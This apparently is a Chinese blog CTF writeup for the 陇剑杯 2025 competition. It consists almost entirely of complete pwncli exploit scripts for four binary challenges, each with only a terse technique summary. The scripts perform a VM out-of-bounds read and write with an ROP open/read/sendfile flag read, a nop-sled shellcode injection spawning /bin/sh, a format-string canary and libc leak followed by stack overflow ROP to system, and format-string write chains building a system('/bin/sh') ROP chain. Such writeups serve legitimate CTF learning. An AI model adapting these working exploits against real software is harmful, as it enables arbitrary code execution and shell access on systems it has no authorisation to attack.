陇剑杯-2025

陇剑杯-2025

InkeyP Lv3

陇剑杯 2025 WP

初赛

漏水流水线

越界读写,ROP orw

#!/usr/bin/env python3
from pwncli import *

# Harness setup.  Every unqualified name in this script (context, sys, re, gift,
# ELF, process, remote, init_x64_context, load_libc, ru/sl/s/ia, CG, ...) comes
# from `from pwncli import *`; nothing here runs without that package.
context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
# Mode is taken from argv[1]: "remote" connects to the challenge host, anything
# else runs ./vuln locally.  With no argument this is the int 0, not a string.
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './vuln')
if local_flag == "remote":
    addr = 'pwn-4f374d898f.challenge.longjiancup.cn 9999'
    ip, port = re.split(r'[\s:]+', addr)  # accepts "host port" or "host:port"
    gift.io = remote(ip, port, ssl=True)
else:
    gift.io = process(elf_path)
# "nodbg" presumably means "run locally but behave as if remote (no debugger)";
# confirm against pwncli's handling of gift.remote.
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()  # no path given: pwncli chooses the libc — confirm which build it picks


def gc(op=0, d=10, s1=10, s2=10, imm=0):
    """Append one VM instruction to the module-level ``code`` string.

    The instruction is emitted as five space-separated decimal fields
    ``op dest src1 src2 imm`` followed by a tab, which is the text form the
    script later sends to the challenge with ``sl(code)``.  Register fields
    default to 10 when unused.  Returns nothing; the only effect is the
    mutation of the global ``code``.
    """
    global code
    fields = (op, d, s1, s2, imm)
    code += ' '.join(str(field) for field in fields) + '\t'


# gdb script handed to launch_gdb().  The commented-out lines are the author's
# notes on where the VM handlers sit; only the 0x35B1 breakpoint is active.
# (brva presumably means a breakpoint at a binary-relative address — pwncli/pwndbg specific.)
cmd = '''
# brva 0x2D0C
# op 0x47

# brva 0x2B0A
# op pop8

# brva 0x23F0
# op sub

# brva 0x2EF8
# WB

brva 0x35B1
# main return

# ida
c
'''
launch_gdb(cmd)

# Author's reference table of the challenge VM's opcodes (a bare string, never
# executed).  Opcode numbers used in the gc() calls below refer to this table.
'''
mov 1
movi 2
add 3
sub 4
and 0x14 (src2 & src1)
or 0x15
xor 0x16
not 0x17
shl 0x18 (src1 << (imm & 0x3F))
shr 0x19 (src1 >> (imm & 0x3F))
mul 0x1A
div 0x1B
mod 0x1C
- 0x1D (-src1)
cmp 0x1E (src1 > src2 ? 1 : (src1 == src2 ? 0 : -1))
== 0x1F (src1 == src2 ? 1 : 0)
> 0x20 (src1 > src2 ? 1 : 0)
< 0x21 (src1 < src2 ? 1 : 0)

pop 0x32 (dest = stack[src1 + imm]) *(_BYTE *)
push 0x33 (stack[dest + imm] = src1) *(_BYTE *)
pop qd 0x34 (dest = stack[src1 + imm]) *(_QWORD *)
push qd 0x35 (stack[dest + imm] = src1) *(_QWORD *)
memmove 0x36 (memmove((stack + dest), (stack + src1), src2))
lea 0x47 (*src1 = dest)

exit 0x63
'''

CG.set_find_area(False, True)  # pwncli gadget finder; presumably "search libc, not the binary" — confirm
code = ''  # instruction buffer that gc() appends to
ru(b'input your opcode')
# Two 8-byte out-of-bounds reads (opcode 0x34, see table) relative to the VM stack.
# NOTE(review): 0x20281D0 and the two offsets are tied to the exact binary/libc
# build the writeup targeted and will not transfer to another build.
gc(0x34, 1, imm=0x20281D0 + 0x222200) # environ
gc(0x34, 2, imm=0x20281D0 + 0x21A980) # _IO_wfile_jumps

# Opcodes used below: 1 = mov, 2 = movi, 3 = add, 4 = sub, 0x18 = shl, 0x47 = lea.
# The bare gc(1) calls (mov between the default register 10 and itself) appear
# to be spacers between dependent instructions — the challenge name suggests a
# pipeline hazard, but confirm against the VM.
gc(2, 3, 3, imm=0x120)
gc(1)
gc(4, 1, 1, 3)
gc(2, 5, 5, imm=8)

# Each libc address is carried in two pieces — (addr >> 12) shifted back by 12
# plus (addr & 0xFFF) — presumably because the imm field cannot hold the full value.
rdi = CG.pop_rdi_ret()
gc(2, 3, 3, imm=(libc.sym._IO_wfile_jumps - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym._IO_wfile_jumps - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(4, 7, 2, 3)
gc(0x47, 7, 1)  # lea: write register 7 through the pointer in register 1

gc(2, 3, 3, imm=0xA0)
gc(1)
gc(3, 6, 1, 3)
gc(1)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 6, 1)

# Same split-and-recombine pattern for puts.
gc(2, 3, 3, imm=(libc.sym.puts - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym.puts - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(3, 2, 7, 3)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 2, 1)

gc(3, 1, 1, 5)
gc(1)
gc(0x47, 7, 1)

gc(3, 1, 1, 5)
gc(1)
gc(0x47, 1, 1)

# Same pattern for gets.
gc(2, 3, 3, imm=(libc.sym.gets - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym.gets - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(3, 2, 7, 3)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 2, 1)


gc(0x63)  # exit (see table)
sl(code)

ru(b'Executing\n')
# The line printed after "Executing" ends in a 6-byte libc pointer; 0x29E40 is
# the build-specific distance from that pointer to the libc base — re-derive per build.
libc_base = u64_ex(ru(b'\x0a', drop=True)[-6:]) - 0x29E40
set_current_libc_base_and_log(libc_base)

# Second stage: the ROP chain for the "orw" flag read named in the writeup.
# Gadgets are re-resolved after reset() so they are absolute for the leaked base.
CG.reset()
CG.set_find_area(False, True)
ret = CG.ret()
rdi = CG.pop_rdi_ret()
rsi = CG.pop_rsi_ret()
rdx_rbx = CG.pop_rdx_rbx_ret()
rcx = CG.pop_rcx_ret()

# Eight ret gadgets as padding, then read(0, buf, 0x100) with
# buf = libc_base + 0x21F000 (assumed to be a writable libc page — confirm).
payload = p64(ret) * 8 + flat([rdi, 0, rsi, libc_base + 0x21F000, rdx_rbx, 0x100, 0, libc.sym.read])
# open(buf, 0); the inner flat() is redundant (flat() of bytes is the same bytes).
payload += flat(flat([rdi, libc_base + 0x21F000, rsi, 0, libc.sym.open]))
# sendfile(1, 3, 0, 0x100) — assumes open() returned fd 3.
payload += flat([rdi, 1, rsi, 3, rdx_rbx, 0, 0, rcx, 0x100, libc.sym.sendfile])
sl(payload)

s(b'/flag\x00')  # consumed by the read() in the chain above

ia()

决赛

find_the_way

栈可执行,nop滑梯,把返回地址改成rbp,末位改为00

#!/usr/bin/env python3
from pwncli import *

# Harness setup; same skeleton as the other scripts in this writeup, all names
# coming from `from pwncli import *`.
context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
# argv[1]: "remote" connects to the host below, anything else runs ./way locally.
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './way')
if local_flag == "remote":
    addr = '173.31.73.75 9999'
    ip, port = re.split(r'[\s:]+', addr)  # accepts "host port" or "host:port"
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc('/lib/x86_64-linux-gnu/libc.so.6')  # explicit host libc; unused by the rest of this script

# Two absolute breakpoints (the binary is loaded at a fixed address) and continue.
cmd = '''
b *0x4012AF
b *0x401315
c
'''
launch_gdb(cmd)

# Three prompts.  Per the writeup: the stack is executable, the buffer is filled
# with a nop sled, and the saved return address gets its low byte set to 0x00 so
# execution lands inside the sled.  Numeric answers are sent as decimal text
# (str(0x80) is "128").
ru(b'Where is the your home:')
sl(str(0x80))
ru(b'Where can you find mother:')
# Leading 0x00, 0x78 nop bytes, a 7-byte instruction stub (looks like a
# stack-pointer adjustment — confirm by disassembling), then pwncli's canned
# execve("/bin/sh") shellcode.
s(b'\x00' + b'\x90' * 0x78 + b'\x48\x81\xc4\x00\x10\x00\x00' + ShellcodeMall.amd64.execve_bin_sh)
ru(b'How many moms did you find:')
sl(str(0xA8))

ia()

Writer

进dream的校验没清空栈,在write中布置好,submit时负数溢出拿到钱,dream格串+栈溢出

#!/usr/bin/env python3
from pwncli import *

# Harness setup; same skeleton as the other scripts in this writeup, all names
# coming from `from pwncli import *`.
context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
# argv[1]: "remote" connects to the host below, anything else runs ./writer locally.
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './writer')
if local_flag == "remote":
    addr = '173.31.73.39 9999'
    ip, port = re.split(r'[\s:]+', addr)  # accepts "host port" or "host:port"
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()  # no path given: pwncli chooses the libc — confirm which build it picks

# gdb script; note it is only launched further down, after the leak.
cmd = '''
brva 0x17FC
c
'''


# Step 1 (writeup: the check guarding "dream" does not clear the stack, so the
# values it expects are planted via the write path first).  0x500 bytes of the
# repeated (0x3B, 0x17) dword pair.
sla(b'> ', b'1')
payload = (p32(0x3B) + p32(0x17)) * (0x500 // 8)
sa(b'Please enter your article.', payload)
# Step 2 (writeup: a negative submission count overflows the balance check).
sla(b'> ', b'2')
sla(b'How many articles do you want to submit?', str(-0x100))
# Step 3: menu option 114514 (presumably the "dream" entry the writeup names)
# accepts a format string; three stack slots are printed: %6 (a code pointer),
# %9 (the canary) and %131 (a libc pointer), '#'-separated for parsing.
sla(b'> ', b'114514')
ru(b'Please enter your article.')
s(b'%6$p#%9$p#%131$p#')
ru(b'0x')
# 0x18E0 and 0x90E93 are build-specific distances from the leaked pointers to
# the code and libc bases; re-derive them for any other build.
code_base = int(ru(b'#0x', drop=True), 16) - 0x18E0
canary = int(ru(b'#0x', drop=True), 16)
libc_base = int(ru(b'#', drop=True), 16) - 0x90E93
set_current_code_base_and_log(code_base)
set_current_libc_base_and_log(libc_base)
leak_ex2(canary)

# Step 4: same entry again, this time overflowing the buffer: 0x408 bytes of
# padding, the canary twice (the second copy presumably fills the saved-rbp
# slot — confirm), then ret / pop rdi / "/bin/sh" / system.
sla(b'> ', b'114514')
launch_gdb(cmd)
ru(b'Please enter your article.')
CG.set_find_area(False, True)  # pwncli gadget finder; presumably "search libc, not the binary" — confirm
payload = b'a' * 0x408 + p64(canary) * 2 + flat([CG.ret(), CG.pop_rdi_ret(), CG.bin_sh(), libc.sym.system])
s(payload)


ia()

easypoivt

前几次格串改次数为超大整数

改返回地址

最后return

#!/usr/bin/env python3
from pwncli import *

# Harness setup; same skeleton as the other scripts in this writeup, all names
# coming from `from pwncli import *`.
context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
# argv[1]: "remote" connects to the host below, anything else runs ./easypivot locally.
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './easypivot')
if local_flag == "remote":
    addr = '173.31.73.6 9999'
    ip, port = re.split(r'[\s:]+', addr)  # accepts "host port" or "host:port"
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()  # no path given: pwncli chooses the libc — confirm which build it picks

# gdb script; only launched near the end, just before the final write.
cmd = '''
brva 0x136E
brva 0x139E
c
'''
# Page 0: format-string leak of three stack slots — %47 (a libc pointer),
# %14 (a stack pointer) and %15 (a code pointer).
sla(b'Which page of history will you write? (0 - 255)\n> ', str(0))
ru(b':\n> ')
s(b'%47$p%14$p%15$p')
ru(b'0x')
# 0x2A47B and 0x139A are build-specific distances to the libc/code bases;
# re-derive them for any other build.
libc_base = int(ru(b'0x', drop=True), 16) - 0x2A47B
stack = int(ru(b'0x', drop=True), 16)
code_base = int(ru(b'\n', drop=True), 16) - 0x139A
set_current_code_base_and_log(code_base)
set_current_libc_base_and_log(libc_base)
leak_ex2(stack)

ret = stack + 0x8  # slot the writeup calls the return address, relative to the leaked stack pointer

# From here on every write is a pair of pages: page 1 stores a 16-bit value
# through the pointer in slot 32 (%32$hn), page 2 stores a 16-bit value through
# the pointer in slot 63 (%63$hn).  The pairing suggests slot 32 points at the
# pointer held in slot 63, i.e. a two-stage write — confirm with the
# breakpoints in cmd.  Each format string is padded to 0x10 bytes with NULs.
# First pair (writeup: set the remaining-writes counter to a huge value).
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(stack - 0x4 + 3) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{0x80}c%63$hn'.ljust(0x10, '\x00'))

CG.set_find_area(False, True)  # pwncli gadget finder; presumably "search libc, not the binary" — confirm
rdi = CG.pop_rdi_ret()
ret_ = CG.ret()
sh = CG.bin_sh()
system = libc.sym.system
# NOTE(review): the remaining pairs are one six-line pattern repeated; a small
# helper taking (address, value) would remove the duplication.
# Slot 1 of the chain: pop rdi gadget, written as three 16-bit pieces at
# ret, ret+2, ret+4 (the top two bytes are left as they are).
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

# Slot 2: address of "/bin/sh" (the variable name rdi is reused as "value to write").
ret += 8
rdi = sh
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

# Slot 3: a lone ret gadget (stack alignment padding before system).
ret += 8
rdi = ret_
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

# Slot 4: system.  The two leak_ex2 calls are just debug output.
ret += 8
rdi = system
leak_ex2(ret)
leak_ex2(stack)
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
launch_gdb(cmd)

# Last pair (writeup: "finally return") — the same counter location as the
# first pair is written back to 0 so the write loop ends and the function returns.
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(stack - 0x4 + 3) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{0}c%63$hn'.ljust(0x10, '\x00'))

ia()

  • 标题: 陇剑杯-2025
  • 作者: InkeyP
  • 创建于 : 2025-09-21 12:50:26
  • 更新于 : 2025-09-21 13:15:10
  • 链接: https://blog.inkey.top/202509/21/陇剑杯-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。